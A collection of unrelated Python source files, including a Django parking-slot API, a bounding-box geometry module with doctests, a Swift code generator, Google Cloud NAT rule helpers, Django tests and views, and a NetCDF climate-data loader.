if user.profile != "admin":
slots = [slot.id for slot in slots if slot.get_status() == "Disponible"]
slots = ParkingSlot.objects.filter(pk__in=slots)
count = slots.count()
data = slots.order_by('-created')[
self.pagination_start: self.pagination_end + 1]
return Response({
'count': count,
'data': (ParkingSlotClientSerializer(data,many=True)
if user.profile == "client" else ParkingSlotSerializer(data,many=True)
).data,
}, status=status.HTTP_200_OK)
class SpecificParkingSlotApi(APIView, TokenHandler):
""" Defines the HTTP verbs to specific parking slot model management. """
def get(self, request, *args, **kwargs):
""" Retrieve specific slot information.
Parameters
----------
request (dict)
Contains http transaction information.
Returns
-------
Response (JSON, int)
Body response and status code.
"""
payload, user = self.get_payload(request)
if not payload:
return Response(status=status.HTTP_401_UNAUTHORIZED)
if user.profile != "admin":
return Response(status=status.HTTP_403_FORBIDDEN)
slot = ParkingSlot.objects.filter(
pk=kwargs["id"],is_active=True).first()
if not slot:
return Response({
"code": "slot_not_found",
"detailed": "aparcamiento no encontrado"
},status=status.HTTP_404_NOT_FOUND)
return Response({
"data": ParkingSlotSerializer(slot).data
},status=status.HTTP_200_OK)
def patch(self, request, *args, **kwargs):
""" Update an slot information.
Parameters
----------
request (dict)
Contains http transaction information.
Returns
-------
Response (JSON, int)
Body response and status code.
"""
payload, user = self.get_payload(request)
if not payload:
return Response(status=status.HTTP_401_UNAUTHORIZED)
if user.profile != "admin":
return Response(status=status.HTTP_403_FORBIDDEN)
validator = Validator({"place_code": {"required": False,"type": "string"}})
if not validator.validate(request.data):
return Response({
"code": "invalid_body",
"detailed": "cuerpo inválido",
"data": validator.errors
}, status=status.HTTP_400_BAD_REQUEST)
if not ParkingSlot.objects.filter(pk=kwargs["id"],is_active=True):
return Response({
"code": "slot_not_found",
"detailed": "aparcamiento no encontrado"
},status=status.HTTP_404_NOT_FOUND)
ParkingSlot.objects.filter(pk=kwargs["id"]).update(**request.data)
return Response(status=status.HTTP_200_OK)
def delete(self, request, *args, **kwargs):
""" Delete slot information.
Parameters
----------
request (dict)
Contains http transaction information.
Returns
-------
Response (JSON, int)
Body response and status code.
"""
payload, user = self.get_payload(request)
if not payload:
return Response(status=status.HTTP_401_UNAUTHORIZED)
if user.profile != "admin":
return Response(status=status.HTTP_403_FORBIDDEN)
slot = ParkingSlot.objects.filter(
pk=kwargs["id"],is_active=True).first()
if not slot:
return Response({
"code": "slot_not_found",
"detailed": "aparcamiento no encontrado"
},status=status.HTTP_404_NOT_FOUND)
slot.is_active = False
slot.save()
return Response(status=status.HTTP_200_OK)
|
|
|
|
|
|
from __future__ import print_function
from __future__ import division
import numpy as np
class Line:
"""Line object
Example
-------
>>> from BoundingBox import Line
>>> l1 = Line(-2, 2)
>>> l1.length()
4
Test cases:
--- first
=== second
======
--
--
------
----------
--------------
----------
--
No overlap.
>>> x = Line.fromOverlap(Line(1,10), Line(10,20))
>>> print(x)
[0 0]
>>> x.length()
0
>>> x = Line.fromOverlap(Line(11,12), Line(10,20))
>>> print(x)
[11 12]
>>> x.length()
1
Overlap of 2, first left.
>>> x = Line.fromOverlap(Line(8,12), Line(10,20))
>>> print(x)
[10 12]
>>> x.length()
2
Edge overlap
>>> x = Line.fromOverlap(Line(6,20), Line(10,20))
>>> print(x)
[10 20]
>>> x.length()
10
Second completely inside first.
>>> x = Line.fromOverlap(Line(1,40), Line(20,30))
>>> print(x)
[20 30]
>>> x.length()
10
Edge overlap
>>> x = Line.fromOverlap(Line(10,25), Line(10,20))
>>> print(x)
[10 20]
>>> x.length()
10
No overlap
>>> x = Line.fromOverlap(Line(0,10), Line(-10,-5))
>>> print(x)
[0 0]
>>> x.length()
0
"""
def __init__(self, x1, x2):
self.x1 = x1
self.x2 = x2
# TODO error check. x2 >= x1
def __str__(self):
return "[{} {}]".format(self.x1, self.x2)
def length(self):
return self.x2 - self.x1
@classmethod
def fromOverlap(cls, first, second):
#print("first", first)
#print("second", second)
if first.x2 <= second.x1:
#print("return 0")
return cls(0, 0)
elif first.x2 <= second.x2:
if first.x1 >= second.x1:
#print("return 1")
return first
else:
#print("return 2")
return cls(second.x1, first.x2)
else: # first.x2 > second.x2
if first.x1 >= second.x2:
return cls(0, 0)
elif first.x1 >= second.x1:
#print("return 3")
return cls(first.x1, second.x2)
else: # first.x1 < second.x1
#print("return 4")
return second
class BoundingBox:
""""Bounding Box object
- works for pixel values as well as real values.
>>> import numpy as np
>>> from BoundingBox import BoundingBox
>>> box = BoundingBox( (1,2), (4,5) )
>>> box.ul()
array([1, 2])
>>> box.lr()
array([4, 5])
>>> box.ur()
array([4, 2])
>>> box.ll()
array([1, 5])
>>> box.contour()
array([[1, 2],
[4, 2],
[4, 5],
[1, 5],
[1, 2]])
>>> box.area()
9
>>> box.bound(lower_right=[3,4]).lr()
array([3, 4])
>>> box.bound(upper_left=[2,3]).ul()
array([2, 3])
>>> box.area()
1
>>> print(box)
[[2 3]
[3 4]]
>>> contour = np.array([[1, 2], [4, 2], [4, 5], [1, 5], [1, 2]])
>>> print(BoundingBox.fromContour(contour))
[[1. 2.]
[4. 5.]]
"""
def __init__(self, upper_left=None, lower_right=None):
"""Init object if upper left or lower right point is given.
Parameters
----------
upper_left : np.array(2)
lower_right : np.array(2)
"""
#TODO error check that ul point is instead ul, lr point is indeed lr.
if upper_left is None:
self.upper_left_ = np.zeros(2)
else:
self.upper_left_ = np.array(upper_left)
#print(type(self.upper_left_), self.upper_left_)
if lower_right is None:
self.lower_right_ = np.zeros(2)
else:
self.lower_right_ = np.array(lower_right)
#print(type(self.lower_right_), self.lower_right_)
@classmethod
def fromContour(cls, contour):
"""Create a bounding box from a contour set.
Parameters
----------
contour : list of np.array(2)
A list of points describing a contour.
Returns
-------
self
A new self object.
"""
mins = np.amin(contour, axis=0)
maxs = np.amax(contour, axis=0)
upper_left = np.floor(mins) # assumes pixel as coordinates
lower_right = np.floor(maxs) # assumes pixel as coordinates
return cls(upper_left, lower_right)
@classmethod
def fromOverlap(cls, first, second):
"""Create a bounding box of the intercept.
Parameters
----------
first : BoundingBox
second : BoundingBox
Return
------
BoundingBox
Example
-------
>>> from BoundingBox import BoundingBox
Some overlap
>>> first = BoundingBox( (2,1), (5,4) )
>>> second = BoundingBox( (4,3), (8,5) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[4 3]
[5 4]]
No overlap
>>> first = BoundingBox( (2,1), (5,4) )
>>> second = BoundingBox( (3,5), (5,7) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[0 0]
[0 0]]
Share an edge
>>> first = BoundingBox( (4,3), (8,5) )
>>> second = BoundingBox( (3,5), (5,7) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[0 0]
[0 0]]
Second completely inside first.
>>> first = BoundingBox( (2,1), (9,7) )
>>> second = BoundingBox( (4,3), (8,5) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[4 3]
[8 5]]
First completely inside second.
>>> first = BoundingBox( (4,3), (8,5) )
>>> second = BoundingBox( (2,1), (9,7) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[4 3]
[8 5]]
First is sideway inside second on the right
>>> first = BoundingBox( (6,4), (7,6) )
>>> second = BoundingBox( (4,3), (8,5) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[6 4]
[7 5]]
Corner touching
>>> first = BoundingBox( (2,1), (5,4) )
>>> second = BoundingBox( (5,4), (6,5) )
>>> overlap_box = BoundingBox.fromOverlap(first, second)
>>> print(overlap_box)
[[0 0]
[0 0]]
"""
# row
line_first = Line( first.ul()[0], first.lr()[0] )
line_second = Line( second.ul()[0], second.lr()[0] )
row_overlap = Line.fromOverlap(line_first, line_second)
#print("row_overlap", row_overlap)
# col
line_first = Line( first.ul()[1], first.lr()[1] )
line_second = Line( second.ul()[1], second.lr()[1] )
col_overlap = Line.fromOverlap(line_first, line_second)
#print("col_overlap", col_overlap)
if (row_overlap.length() == 0) or (col_overlap.length() == 0):
return cls( (0,0), (0,0) )
else:
return cls( (row_overlap.x1, col_overlap.x1), (row_overlap.x2, col_overlap.x2) )
def height(self):
"""
Returns
-------
float
Height of bounding box.
Example
-------
>>> from BoundingBox import BoundingBox
>>> b = BoundingBox( (4,3), (8,5) )
>>> b.height()
4
"""
return self.lower_right_[0] - self.upper_left_[0]
def width(self):
"""
Returns
-------
float
Width of bounding box.
Example
-------
>>> from BoundingBox import BoundingBox
>>> b = BoundingBox( (4,3), (8,5) )
>>> b.width()
2
"""
return self.lower_right_[1] - self.upper_left_[1]
def area(self):
"""
Returns
-------
float
Area of bounding box.
Example
-------
>>> from BoundingBox import BoundingBox
>>> b = BoundingBox( (4,3), (8,5) )
>>> b.area()
8
"""
return self.height() * self.width()
def aspectRatio(self):
"""
Returns
-------
float
Aspect ratio of the box
Example
-------
>>> from BoundingBox import BoundingBox
>>> b = BoundingBox( (4,3), (8,5) )
>>> b.aspectRatio()
0.5
>>> b = BoundingBox( (4,3), (4,5) )
>>> b.aspectRatio()
nan
"""
if float(self.height()) == 0.0:
return float('nan')
else:
return self.width() / self.height()
def ul(self):
"""
Returns
-------
np.array(2)
Return the upper left point, e.g. (row, col)
"""
return self.upper_left_
def lr(self):
"""
Returns
-------
np.array(2)
Return the lower right point, e.g. (row, col)
"""
return self.lower_right_
def ur(self):
"""
Returns
-------
np.array(2)
Return the upper right point, e.g. (row, col)
"""
return np.array([self.lower_right_[0], self.upper_left_[1]])
def ll(self):
"""
Returns
-------
np.array(2)
Return the lower left point, e.g. (row, col)
"""
return np.array([self.upper_left_[0], self.lower_right_[1]])
def contour(self):
"""
Returns
-------
A np.array of np.array(2)
Each contour is an ndarray of shape (n, 2), consisting of n (row, column) coordinates along the contour.
"""
return np.array([self.ul(), self.ur(), self.lr(), self.ll(), self.ul()])
def bound(self, upper_left = None, lower_right = None):
"""Trim bounding box by given limits.
Parameters
----------
upper_left : np.array(2)
lower_right : np.array(2)
Returns
-------
self
Modified self object.
"""
if upper_left is not None:
if upper_left[0] > self.upper_left_[0]:
self.upper_left_[0] = upper_left[0]
if upper_left[1] > self.upper_left_[1]:
self.upper_left_[1] = upper_left[1]
if lower_right is not None:
if self.lower_right_[0] > lower_right[0]:
self.lower_right_[0] = lower_right[0]
if self.lower_right_[1] > lower_right[1]:
self.lower_right_[1] = lower_right[1]
return self
def __str__(self):
"""Return string representation
Returns
-------
str
String representation of self.
"""
x = np.array([self.upper_left_, self.lower_right_])
return "{}".format(x)
if __name__ == "__main__":
import doctest
import sys
(failure_count, test_count) = doctest.testmod()
sys.exit(failure_count)
|
|
utils/data/swift_decls.py
|
|
|
|
from dataclasses import dataclass
from enum import Enum
from typing import List
from pathlib import Path
from utils.converters.syntax_stream import SyntaxStream
from utils.data.compound_symbol_name import CompoundSymbolName
from utils.constants.constants import backticked_term
class SwiftDeclVisitResult(Enum):
"""
Defines the behavior of a SwiftDeclVisitor as it visits declarations.
"""
VISIT_CHILDREN = 0
"The visitor should visit the children of a declaration."
SKIP_CHILDREN = 1
"The visitor should skip the children of a declaration."
@dataclass
class SourceLocation(object):
file: Path
line: int
column: int | None
@dataclass
class SwiftDecl(object):
name: CompoundSymbolName
original_name: CompoundSymbolName
origin: SourceLocation
doccomments: list[str]
"A list of documentation comments associated with this element."
def write(self, stream: SyntaxStream):
for comment in self.doccomments:
stream.line(f"/// {comment}")
def copy(self):
raise NotImplementedError("Must be implemented by subclasses.")
def accept(self, visitor: "SwiftDeclVisitor") -> SwiftDeclVisitResult:
raise NotImplementedError("Must be implemented by subclasses.")
def accept_post(self, visitor: "SwiftDeclVisitor"):
raise NotImplementedError("Must be implemented by subclasses.")
def children(self) -> list["SwiftDecl"]:
raise NotImplementedError("Must be implemented by subclasses.")
@dataclass
class SwiftEnumCaseDecl(SwiftDecl):
def write(self, stream: SyntaxStream):
super().write(stream)
if self.name.to_string() != self.original_name.to_string():
stream.line(
f"static let {backticked_term(self.name.to_string())} = {self.original_name.to_string()}"
)
def copy(self):
return SwiftEnumCaseDecl(
name=self.name,
original_name=self.original_name,
origin=self.origin,
doccomments=self.doccomments,
)
def accept(self, visitor: "SwiftDeclVisitor") -> SwiftDeclVisitResult:
return visitor.visit_enum_case_decl(self)
def accept_post(self, visitor: "SwiftDeclVisitor"):
return visitor.post_enum_case_decl(self)
def children(self) -> list["SwiftDecl"]:
return list()
@dataclass
class SwiftEnumDecl(SwiftDecl):
cases: List[SwiftEnumCaseDecl]
conformances: list[str]
def write(self, stream: SyntaxStream):
super().write(stream)
name = self.name.to_string()
if name != self.original_name.to_string():
stream.line(f"typealias {name} = {self.original_name.to_string()}")
stream.line()
# Emit conformances
if len(self.conformances) > 0:
for conformance in set(self.conformances):
stream.line(f"extension {name}: {conformance} {{ }}")
stream.line()
decl = f"public extension {name}"
if len(self.cases) == 0:
stream.line(decl + " { }")
return
with stream.block(decl + " {"):
for i, case in enumerate(self.cases):
if i > 0:
stream.line()
case.write(stream)
def copy(self):
return SwiftEnumDecl(
name=self.name,
original_name=self.original_name,
origin=self.origin,
doccomments=self.doccomments,
cases=list(map(lambda c: c.copy(), self.cases)),
conformances=self.conformances,
)
def accept(self, visitor: "SwiftDeclVisitor") -> SwiftDeclVisitResult:
return visitor.visit_enum_decl(self)
def accept_post(self, visitor: "SwiftDeclVisitor"):
return visitor.post_enum_decl(self)
def children(self) -> list["SwiftDecl"]:
return list(self.cases)
class SwiftDeclVisitor:
def visit_enum_decl(self, decl: SwiftEnumDecl) -> SwiftDeclVisitResult:
return SwiftDeclVisitResult.VISIT_CHILDREN
def post_enum_decl(self, decl: SwiftEnumDecl):
pass
def visit_enum_case_decl(self, decl: SwiftEnumCaseDecl) -> SwiftDeclVisitResult:
return SwiftDeclVisitResult.VISIT_CHILDREN
def post_enum_case_decl(self, decl: SwiftEnumCaseDecl):
pass
def walk_decl(self, decl: SwiftDecl):
walker = SwiftDeclWalker(self)
walker.walk_decl(decl)
class SwiftDeclAnyVisitor(SwiftDeclVisitor):
"""
A declaration visitor that pipes all visits to `self.visit_any_decl`
"""
def visit_any_decl(self, decl: SwiftDecl) -> SwiftDeclVisitResult:
return SwiftDeclVisitResult.VISIT_CHILDREN
def post_any_decl(self, decl: SwiftDecl):
pass
def visit_enum_decl(self, decl: SwiftEnumDecl) -> SwiftDeclVisitResult:
return self.visit_any_decl(decl)
def post_enum_decl(self, decl: SwiftEnumDecl):
self.post_any_decl(decl)
def visit_enum_case_decl(self, decl: SwiftEnumCaseDecl) -> SwiftDeclVisitResult:
return self.visit_any_decl(decl)
def post_enum_case_decl(self, decl: SwiftEnumCaseDecl):
self.post_any_decl(decl)
class SwiftDeclWalker:
def __init__(self, visitor: SwiftDeclVisitor):
self.visitor = visitor
def walk_decl(self, decl: SwiftDecl):
result = decl.accept(self.visitor)
if result == SwiftDeclVisitResult.VISIT_CHILDREN:
for child in decl.children():
self.walk_decl(child)
decl.accept_post(self.visitor)
|
|
lib/googlecloudsdk/command_lib/compute/routers/nats/rules/rules_utils.py
|
google-cloud-sdk-unofficial/google-cloud-sdk
|
|
|
# -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Util functions for NAT commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.command_lib.compute.routers.nats.rules import flags
from googlecloudsdk.core import exceptions as core_exceptions
import six
def CreateRuleMessage(args, compute_holder):
"""Creates a Rule message from the specified arguments."""
active_ips = [
six.text_type(ip) for ip in flags.ACTIVE_IPS_ARG_CREATE.ResolveAsResource(
args, compute_holder.resources)
]
return compute_holder.client.messages.RouterNatRule(
ruleNumber=args.rule_number,
match=args.match,
action=compute_holder.client.messages.RouterNatRuleAction(
sourceNatActiveIps=active_ips))
class RuleNotFoundError(core_exceptions.Error):
"""Raised when a Rule is not found."""
def __init__(self, rule_number):
msg = 'Rule `{0}` not found'.format(rule_number)
super(RuleNotFoundError, self).__init__(msg)
def FindRuleOrRaise(nat, rule_number):
"""Returns the Rule with the given rule_number in the given NAT."""
for rule in nat.rules:
if rule.ruleNumber == rule_number:
return rule
raise RuleNotFoundError(rule_number)
def UpdateRuleMessage(rule, args, compute_holder):
"""Updates a Rule message from the specified arguments."""
if args.match:
rule.match = args.match
if args.source_nat_active_ips:
rule.action.sourceNatActiveIps = [
six.text_type(ip)
for ip in flags.ACTIVE_IPS_ARG_UPDATE.ResolveAsResource(
args, compute_holder.resources)
]
if args.source_nat_drain_ips:
rule.action.sourceNatDrainIps = [
six.text_type(ip) for ip in flags.DRAIN_IPS_ARG.ResolveAsResource(
args, compute_holder.resources)
]
elif args.clear_source_nat_drain_ips:
rule.action.sourceNatDrainIps = []
|
|
pytoolkit/layers/__init__.py
|
|
|
|
"""カスタムレイヤー。"""
# pylint: skip-file
# flake8: noqa
from .activations import *
from .attentions import *
from .blocks import *
from .convolutional import *
from .endpoint import *
from .misc import *
from .noise import *
from .normalization import *
from .pooling import *
|
|
classphoto/tests/test_view.py
|
|
|
|
from django.test import TestCase
from django.test.client import Client
from mock import patch
from signup import models as signup_api
from classphoto import models as classphoto_api
@patch('signup.models.sequence_model.get_current_sequence_number', lambda: 1)
class ViewTest(TestCase):
SIGNUP_DATA = {
'email': '<EMAIL>',
'questions': {
'timezone': 'Africa/Johannesburg',
'groupRadios': 'true',
'styleRadios': 'try',
'expertiseRadios': 'think',
}
}
BIO_DATA = {
'email': '<EMAIL>',
'name': '<NAME>',
'bio': 'This is some info',
'avatar': 'http://placehold.it/120x120'
}
def test_sequence_redirect(self):
c = Client()
resp = c.get('/classphoto/')
self.assertRedirects(resp, '/classphoto/1/')
def test_un_signedup_bio(self):
c = Client()
resp = c.post('/classphoto/1/save_bio/', self.BIO_DATA)
self.assertRedirects(resp, '/classphoto/1/')
bios = classphoto_api.get_bios(1)
self.assertEquals(len(bios), 0)
def test_signed_up_not_signed_in_bio_save(self):
signup_api.create_signup(**self.SIGNUP_DATA)
c = Client()
resp = c.post('/classphoto/1/save_bio/', self.BIO_DATA)
self.assertRedirects(resp, '/classphoto/1/')
bios = classphoto_api.get_bios(1)
self.assertEquals(len(bios), 0)
@patch('classphoto.emails.mailgun.api.send_email')
def test_request_user_link(self, patcher):
signup = signup_api.create_signup(**self.SIGNUP_DATA)
c = Client()
resp = c.post('/classphoto/request_link/', self.BIO_DATA, follow=True)
self.assertRedirects(resp, '/classphoto/1/')
self.assertTrue(patcher.called)
def test_signed_in(self):
signup = signup_api.create_signup(**self.SIGNUP_DATA)
c = Client()
resp = c.get('/classphoto/1/?key={0}'.format(signup['key']))
session = c.session
self.assertEquals(session['user_email'], self.BIO_DATA['email'])
self.assertRedirects(resp, '/classphoto/1/')
def test_signed_up_signed_in_bio_save(self):
signup = signup_api.create_signup(**self.SIGNUP_DATA)
c = Client()
resp = c.get('/classphoto/1/?key={0}'.format(signup['key']))
resp = c.post('/classphoto/1/save_bio/', self.BIO_DATA)
self.assertRedirects(resp, '/classphoto/1/')
bios = classphoto_api.get_bios(0)
self.assertEquals(len(bios), 0)
|
|
|
|
|
|
from django.conf import settings
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.shortcuts import render
from .forms import EmailSignupForm
from .models import EmailSignup
def email_list_signup(request):
form = EmailSignupForm(request.POST or None)
if request.method == "POST":
if form.is_valid():
email_signup_qs = EmailSignup.objects.filter(email=form.instance.email)
if email_signup_qs.exists():
messages.info(request, "You are already subscribed")
else:
form.save()
messages.success(request, "You are successfully subscribed")
return HttpResponseRedirect(request.META.get('HTTP_REFERER'))
|
|
.config/polybar/scripts/updates.py
|
|
|
|
import subprocess
getVersion = subprocess.Popen("checkupdates | wc -l", shell=True, stdout=subprocess.PIPE).stdout
version = getVersion.read()
if(version.decode() == "0\n"):
print("")
else:
print(version.decode())
|
|
|
|
|
|
import os.path as osp
import numpy as np
from opt import parse_opt
import h5py
from glob import glob
import json
opt = parse_opt()
opt = vars(opt)
class Roidb(object):
def __init__(self, image_set, model_method):
self.image_set = image_set
self.model_method = model_method
self._data_path = osp.join(opt['data_root'], 'gt_objects')
self._image_ids, self._roidb, self._h5_files, self._h5_lrel_files = self._load_roidb()
def _load_roidb(self):
info_file = osp.join(self._data_path, 'gt_objects_info.json')
num_files = len(glob(osp.join(self._data_path, 'gt_objects_*.h5')))
h5_paths = [osp.join(self._data_path, 'gt_objects_%d.h5' % n)
for n in range(num_files)]
h5_lrel_paths = [osp.join(self._data_path, 'lrel_gt_objs_%d.h5' % n)
for n in range(num_files)]
with open(info_file) as f:
all_info = json.load(f)
h5_files = [h5py.File(path, 'r') for path in h5_paths]
image_ids = []
data = {}
for img_id in all_info:
info = all_info[img_id]
file, idx, num = info['file'], info['idx'], info['objectsNum']
bbox = h5_files[file]['bboxes'][idx]
if 'cls' in h5_files[file]:
cls = h5_files[file]['cls'][idx]
else:
cls = np.ones((num,), dtype=np.int) * 999999
width = info['width']
height = info['height']
image_ids.append(img_id)
data[img_id] = {'size': np.array([width, height], dtype=np.float32),
'num_objs': num,
'cls': np.array(cls[0:num], dtype=np.float32),
'box': np.array(bbox[0:num,:], dtype=np.float32),
'file': file,
'idx': idx}
if self.model_method in ['cmrin', 'dga']:
h5_lrel_files = [h5py.File(path, 'r') for path in h5_lrel_paths]
return image_ids, data, h5_files, h5_lrel_files
else:
return image_ids, data, h5_files, None
@property
def image_ids(self):
return self._image_ids
@property
def roidb(self):
return self._roidb
@property
def num_images(self):
return len(self.image_id)
@property
def h5_files(self):
return self._h5_files
@property
def h5_lrel_files(self):
return self._h5_lrel_files
|
|
snakypy/zshpower/commands/reset.py
|
|
|
|
from snakypy.helpers import printer
from snakypy.helpers.ansi import FG
from snakypy.helpers.catches.generic import whoami
from snakypy.zshpower.commands.utils.handle import records
from snakypy.zshpower.config.base import Base
from snakypy.zshpower.config.config import config_content
from snakypy.zshpower.database.dao import DAO
from snakypy.zshpower.utils.check import checking_init
from snakypy.zshpower.utils.modifiers import create_toml
from snakypy.zshpower.utils.process import reload_zsh
class ResetCommand(Base):
def __init__(self, home: str):
Base.__init__(self, home)
def run(self, arguments: dict) -> None:
checking_init(self.HOME, self.logfile)
if arguments["--config"]:
create_toml(config_content, self.config_file, force=True)
printer("Reset process finished.", foreground=FG().FINISH)
self.log.record(
f"User ({whoami()}) reset settings.", colorize=True, level="info"
)
reload_zsh()
elif arguments["--db"]:
DAO().create_table(self.tbl_main)
records("insert", "ZSHPower Restoring the database ...", FG().QUESTION)
printer("Done!", foreground=FG().FINISH)
self.log.record(
f"User ({whoami()}) reset database.", colorize=True, level="info"
)
|
|
|
|
|
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import calendar
from datetime import timedelta ,datetime
import re
import string
from ocw.dataset import Dataset
import ocw.utils as utils
import netCDF4
import numpy
import numpy.ma as ma
LAT_NAMES = ['x', 'rlat', 'rlats', 'lat', 'lats', 'latitude', 'latitudes']
LON_NAMES = ['y', 'rlon', 'rlons', 'lon', 'lons', 'longitude', 'longitudes']
TIME_NAMES = ['time', 'times', 'date', 'dates', 'julian']
def _get_netcdf_variable_name(valid_var_names, netcdf, netcdf_var):
''' Determine if one of a set of variable names are in a NetCDF Dataset.
Looks for an occurrence of a valid_var_name in the NetCDF variable data.
This is useful for automatically determining the names of the lat, lon,
and time variable names inside of a dataset object.
:param valid_var_names: The possible variable names to search for in
the netCDF object.
:type valid_var_names: List of Strings
:param netcdf: The netCDF Dataset object in which to check for
valid_var_names.
:type netcdf: netcdf4.Dataset
:param netcdf_var: The relevant variable name to search over in the
netcdf object. This is used to narrow down the search for valid
variable names by first checking the desired variable's dimension
values for one or more of the valid variable names.
:returns: The variable from valid_var_names that it locates in
the netCDF object.
:raises ValueError: When unable to locate a single matching variable
name in the NetCDF Dataset from the supplied list of valid variable
names.
'''
# Check for valid variable names in netCDF variable dimensions
dimensions = netcdf.variables[netcdf_var].dimensions
dims_lower = [dim.encode().lower() for dim in dimensions]
intersect = set(valid_var_names).intersection(dims_lower)
if len(intersect) == 1:
# Retrieve the name of the dimension where we found the matching
# variable name
index = dims_lower.index(intersect.pop())
dimension_name = dimensions[index].encode()
# Locate all of the variables that share the dimension that we matched
# earlier. If the dimension's name matches then that variable is
# potentially what we want to return to the user.
possible_vars = []
for var in netcdf.variables.keys():
var_dimensions = netcdf.variables[var].dimensions
# Skip any dimensions are > 1D
if len(var_dimensions) != 1:
continue
if var_dimensions[0].encode() == dimension_name:
possible_vars.append(var)
# If there are multiple variables with matching dimension names then we
# aren't able to determining the correct variable name using the
# variable dimensions. We need to try a different approach. Otherwise,
# we're done!
if len(possible_vars) == 1:
return possible_vars[0]
# Check for valid variable names in netCDF variable names
variables = netcdf.variables.keys()
vars_lower = [var.encode().lower() for var in variables]
intersect = set(valid_var_names).intersection(vars_lower)
if len(intersect) == 1:
index = vars_lower.index(intersect.pop())
return variables[index]
# If we couldn't locate a single matching valid variable then we're unable
# to automatically determine the variable names for the user.
error = (
"Unable to locate a single matching variable name from the "
"supplied list of valid variable names. "
)
raise ValueError(error)
def load_file(file_path,
variable_name,
elevation_index=0,
name='',
lat_name=None,
lon_name=None,
time_name=None):
''' Load a NetCDF file into a Dataset.
:param file_path: Path to the NetCDF file to load.
:type file_path: :mod:`string`
:param variable_name: The variable name to load from the NetCDF file.
:type variable_name: :mod:`string`
:param elevation_index: (Optional) The elevation index for which data should
be returned. Climate data is often times 4 dimensional data. Some
datasets will have readins at different height/elevation levels. OCW
expects 3D data so a single layer needs to be stripped out when loading.
By default, the first elevation layer is used. If desired you may
specify the elevation value to use.
:type elevation_index: :class:`int`
:param name: (Optional) A name for the loaded dataset.
:type name: :mod:`string`
:param lat_name: (Optional) The latitude variable name to extract from the
dataset.
:type lat_name: :mod:`string`
:param lon_name: (Optional) The longitude variable name to extract from the
dataset.
:type lon_name: :mod:`string`
:param time_name: (Optional) The time variable name to extract from the
dataset.
:type time_name: :mod:`string`
:returns: An OCW Dataset object with the requested variable's data from
the NetCDF file.
:rtype: :class:`dataset.Dataset`
:raises ValueError: When the specified file path cannot be loaded by ndfCDF4
or when the lat/lon/time variable name cannot be determined
automatically.
'''
try:
netcdf = netCDF4.Dataset(file_path, mode='r')
except RuntimeError:
err = "Dataset filepath is invalid. Please ensure it is correct."
raise ValueError(err)
except:
err = (
"The given file cannot be loaded. Please ensure that it is a valid "
"NetCDF file. If problems persist, report them to the project's "
"mailing list."
)
raise ValueError(err)
if not lat_name:
lat_name = _get_netcdf_variable_name(LAT_NAMES, netcdf, variable_name)
if not lon_name:
lon_name = _get_netcdf_variable_name(LON_NAMES, netcdf, variable_name)
if not time_name:
time_name = _get_netcdf_variable_name(TIME_NAMES, netcdf, variable_name)
lats = netcdf.variables[lat_name][:]
lons = netcdf.variables[lon_name][:]
time_raw_values = netcdf.variables[time_name][:]
times = utils.decode_time_values(netcdf, time_name)
times = numpy.array(times)
values = ma.array(netcdf.variables[variable_name][:])
# If the values are 4D then we need to strip out the elevation index
if len(values.shape) == 4:
# Determine the set of possible elevation dimension names excluding
# the list of names that are used for the lat, lon, and time values.
dims = netcdf.variables[variable_name].dimensions
dimension_names = [dim_name.encode() for dim_name in dims]
lat_lon_time_var_names = [lat_name, lon_name, time_name]
elev_names = set(dimension_names) - set(lat_lon_time_var_names)
# Grab the index value for the elevation values
level_index = dimension_names.index(elev_names.pop())
# Strip out the elevation values so we're left with a 3D array.
if level_index == 0:
values = values [elevation_index,:,:,:]
elif level_index == 1:
values = values [:,elevation_index,:,:]
elif level_index == 2:
values = values [:,:,elevation_index,:]
else:
values = values [:,:,:,elevation_index]
return Dataset(lats, lons, times, values, variable_name, name=name)
|
|
store/adminshop/views/taller.py
|
|
|
|
# -*- coding: utf-8 -*-
# @Author: <NAME> <valle>
# @Date: 29-Sep-2017
# @Email: <EMAIL>
# @Last modified by: valle
# @Last modified time: 17-Dec-2017
# @License: Apache license vesion 2.0
from django.db.models import Q
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.conf import settings
from django.contrib.auth.decorators import login_required, permission_required
from adminshop.forms import (TipoTesteoForm, FinTesteoForm, ActuacionesForm, NotasReparacionForm)
from adminshop.models import (Productos, ListaTesteo, Testeo, Presupuesto, Clientes,
Historial, Reparaciones, NotasReparacion,
ESTADO_CHOICES_TESTEO)
from adminshop.utility import save_historial
from tokenapi.http import JsonError, JsonResponse
import threading
def send_men_rep(cliente, estado):
from django.core.mail import send_mail
from django.template.loader import render_to_string
if estado=="OK":
mens = "terminal_reparado"
asunto = "Terminal reparado"
else:
mens = "terminal_no_reparado"
asunto = "Reparacion no viable"
msg_plain = render_to_string(settings.BASE_DIR+'/templates/email/%s.html' % mens,
{'nombre': cliente.nombre_completo})
send_mail(
asunto,
msg_plain,
"<EMAIL>",
[cliente.email],
)
@login_required(login_url='login_tk')
